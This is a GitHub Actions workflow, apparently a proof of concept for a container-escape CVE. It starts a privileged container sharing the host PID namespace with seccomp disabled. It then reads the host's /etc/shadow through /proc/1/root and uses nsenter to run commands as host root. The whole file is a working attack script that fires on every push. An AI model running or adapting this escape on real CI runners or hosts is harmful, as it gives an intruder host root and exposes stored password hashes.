22 lines
906 B
YAML
22 lines
906 B
YAML
name: CVE-2026-58053-poc
|
|
on: [push, workflow_dispatch]
|
|
jobs:
|
|
escape:
|
|
runs-on: ubuntu-latest
|
|
container:
|
|
image: ubuntu:22.04
|
|
options: --pid=host --cap-add=SYS_PTRACE --security-opt seccomp=unconfined
|
|
steps:
|
|
- name: escape
|
|
run: |
|
|
echo '[*] CVE-2026-58053 — container escape proof'
|
|
echo '[*] container pid ns:' $(readlink /proc/self/ns/pid)
|
|
echo '[*] host pid1 cmdline:' $(cat /proc/1/cmdline | tr '\0' ' ')
|
|
echo '[*] host hostname (proc):' $(cat /proc/1/root/etc/hostname 2>/dev/null)
|
|
echo '[*] host /etc/shadow (first 5 lines):'
|
|
cat /proc/1/root/etc/shadow 2>/dev/null | head -5
|
|
echo '[*] nsenter id (host root):'
|
|
nsenter -t 1 -m -u -i -n -p -- id 2>/dev/null
|
|
echo '[*] custom cmd: cat /etc/shadow'
|
|
nsenter -t 1 -m -u -i -n -p -- sh -c 'cat /etc/shadow' 2>/dev/null
|